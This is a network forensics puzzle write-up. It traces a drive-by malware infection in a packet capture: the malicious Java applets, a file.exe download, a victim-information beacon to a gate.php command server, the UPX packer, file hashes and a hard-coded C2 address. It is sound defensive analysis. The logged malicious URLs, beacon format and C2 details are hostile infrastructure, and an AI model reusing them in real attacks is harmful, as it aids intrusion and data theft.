Name: Bashar Ewaida Description: Puzzel #5: Ms. Moneymany’s Mysterious Malware The answers: 1. As part of the infection process, Ms. Moneymany’s browser downloaded two Java applets. What were the names of the two .jar files that implemented these applets? Tools: tshark, chaosreader.pl, text editor (to view true.php) Details: tshark was quite helpful during the course of working on this puzzle. tshark -r infected.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri -e http.request.method | awk '{print $1," => ",$2, "\t ","http://"$3$4}' [..] 192.168.23.129 => 59.53.91.102 http://nrtjo.eu/q.jar 192.168.23.129 => 59.53.91.102 http://nrtjo.eu/sdfg.jar [..] That the two jar files are: "q.jar" and "sdfg.jar" chaosreader.pl output: www: 192.168.23.129:1064 -> 59.53.91.102:80 File infected.pcap, Session 6 GET /sdfg.jar HTTP/1.1 www: 192.168.23.129:1065 -> 59.53.91.102:80 File infected.pcap, Session 7 GET /q.jar HTTP/1.1 Viewing true.php source document.write(''); We can see ="sdfg.'+'jar" And "q.jar" 2. What was Ms. Moneymany’s username on the infected Windows system? Tools: tshark, Network Miner, chaosreader.pl Deatils: Using tshark tshark -r infected.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri -e http.request.method | awk '{print $1," => ",$2, "\t ","http://"$3$4}' 192.168.23.129 => 212.252.32.20 http://freeways.in/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed It looks like malicious code is sending information about the victim including GUID, status (stat), Internet Explorer (IE) version (8.0.6001.18702), etc. From this info, we can say that Ms. Moneymany's username was "Administrator". 3. What was the starting URL of this incident? In other words, on which URL did Ms. Moneymany probably click? Tools: tshark, google, text editor, chaosreader.pl Details tshark -r infected.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," => ",$2, "\t ","http://"$3$4}' 192.168.23.129 -> 59.53.91.102 http://nrtjo.eu/true.php tshark shows that the URL requested by the user was: "http://nrtjo.eu/true.php" Using google to search for nrtjo.eu showed that it was identified as malicious by various websites. malwareurl.com showed a good detail about this website: http://www.malwareurl.com/listing.php?domain=nrtjo.eu Malicious URLs on nrtjo.eu /index.php /true.php /xxx.xxx //pdf.php?spl=ie //loading.php?spl=pdf_email_ Whois and network details Additional IP(s): Reverse: 59.53.91.102 Name servers: ns2.vnmhab.com => 59.53.91.102 | 8 domains listed using this name server ns1.vnmhab.com => 59.53.91.102 | 8 domains listed using this name server www.eurid.eu => 195.234.53.204 | 257 domains listed using this name server Based on the behavior described, and also true.php source code we see that this page does not show anything to the end user (Ms. Moneymany) It does a request to http://nrtjo.eu//loading.php?spl=javad Which downloads an executable called file.exe as we can see in the following chaosreader.pl output (Other tools like wireshark, network miner, etc. shows same thing): www: 192.168.23.129:1066 -> 59.53.91.102:80 File infected.pcap, Session 11 GET //loading.php?spl=javadnw&J050006010 HTTP/1.1 User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_05 Host: nrtjo.eu Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive HTTP/1.1 200 OK Server: nginx Date: Wed, 17 Mar 2010 00:56:05 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.2.11 Content-Disposition: inline; filename=file.exe 4. As part of the infection, a malicious Windows executable file was downloaded onto Ms. Moneymany’s system. What was the file’s MD5 hash? Hint: It ends on -Y΄91ed‘. Tools: tshark, Network Miner, md5sum Details: The hint itself was very helpful. :) Using tshark we can see info sent by the victims machine that includes the md5 hash of the downloaded file tshark -r infected.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri -e http.request.method | awk '{print $1," => ",$2, "\t ","http://"$3$4}' 192.168.23.129 => 212.252.32.20 http://freeways.in/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed We see that md5=5942ba36cf732097479c51986eee91ed which ends with 91ed. :) Using Network Miner we get "file.exe.octet-stream". Runing md5sum on the file will give the same md5 hash. 5. What is the name of the packer used to protect the malicious Windows executable? Hint: This is one of the most popular freely-available packers seen in ΄mainstream‘ malware. Tools: Network Miner, Microsoft essentials security, Immunity Debuger, hexdump Details: 1-)Using Network Miner we can extract the executable. Doing so while Microsoft security essentials is running will give the following message: Description: This program is dangerous and executes commands from an attacker. Recommendation: Remove this software immediately. Microsoft Security Essentials detected programs that may compromise your privacy or damage your computer. You can still access the files that these programs use without removing them (not recommended). To access these files, select the 'Allow' action and click 'Apply actions'. If this option is not available, log on as administrator or ask the local administrator for help. Items: file: \AssembledFiles\59.53.91.102\HTTP - TCP 80\file.exe.octet-stream->(UPX) file: \AssembledFiles\59.53.91.102\HTTP - TCP 80\file.exe[1].octet-stream->(UPX) As we can see in the "Items" section, (UPX) is the packer used to protect the malicious executable. 2-) Using hexdump on Linux we can see UPX 3.04 in the output: $hexdump -C file.exe.octet-stream 000001e0 55 50 58 30 00 00 00 00 00 80 00 00 00 10 00 00 |UPX0............| 000001f0 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 |................| 00000200 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 |........UPX1....| 00000210 00 10 01 00 00 90 00 00 00 02 01 00 00 04 00 00 |................| 00000220 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 |............@...| 00000230 2e 72 73 72 63 00 00 00 00 10 00 00 00 a0 01 00 |.rsrc...........| 00000240 00 04 00 00 00 06 01 00 00 00 00 00 00 00 00 00 |................| 00000250 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 |....@...........| 00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000003d0 00 00 00 00 00 00 00 00 00 00 00 33 2e 30 34 00 |...........3.04.| I've used the new PeDetect under Immunity Debugger which showed different result Message=[+] Signature Found : ['Crypto-Lock 2.02 (Eng) -> Ryan Thian'] However from "1" and "2" it is safe to say the it was UPX packer that was used. 6. What is the MD5 hash of the unpacked version of the malicious Windows executable file? Tools: UPX, md5sum, Network Miner Details: Using Network Miner we get "file.exe.octet-stream". Using UPX we can get the unpacked version of the file: ./upx -k -d file.exe.octet-stream Then running the md5sum will give us the md5 hash of the unpacked version which is: 0f37839f48f7fc77e6d50e14657fb96e 7. The malicious executable attempts to connect to an Internet host using an IP address which is hard-coded into it (there was no DNS lookup). What is the IP address of that Internet host? Tools: wireshark, chaosreader.pl, google Details: We can see from chaosreader.pl output that the victim machine made a connection with 213.155.29.144 port 444 without DNS lookup. This can be seen in Wireshark in the frames between 275 and 283 Googling for that IP shows that it was flagged as malicious by some sites including the following: https://safeweb.norton.com/report/show?name=213.155.29.144 213.155.29.144 Summary Computer Threats: 1 Identity Threats: 0 Annoyance factors: 0 Total threats on this site: 1 And http://www.threatexpert.com/report.aspx?md5=0f37839f48f7fc77e6d50e14657fb96e [..] A keylogger program that can capture all user keystrokes (including confidential details such username, password, credit card number, etc.) [..] There was registered attempt to establish connection with the remote host. The connection details are: Remote Host Port Number 213.155.29.144 444 [..]